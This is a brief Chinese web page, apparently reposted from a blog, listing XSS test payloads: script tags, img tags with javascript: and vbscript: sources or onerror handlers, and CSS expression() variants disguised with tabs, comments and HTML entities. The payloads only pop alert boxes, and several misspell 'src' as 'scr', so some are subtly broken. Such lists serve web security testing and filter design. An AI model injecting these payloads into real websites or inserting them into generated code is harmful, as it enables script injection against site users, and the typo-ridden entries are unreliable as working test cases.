xss测试用例小结 - 走看看

zoukankan html css js c++ java

xss测试用例小结

<script>alert("跨站")</script> (最常用）
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格）
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释）
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:065078ression (alert('xss'))}></div>
html 实体 <div style={left:&#ｘ0065；xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">[/post]

查看全文

相关阅读:
float浮动
 数据库基础操作
 Python re 模块
 I/O模型的使用
 函数形参与实参
 内置函数重写_运算符重载
 导入模块_导入包_标准库模块
 异常处理
 闭包
 函数式编程

原文地址：https://www.cnblogs.com/milantgh/p/4272905.html

Copyright © 2011-2022 走看看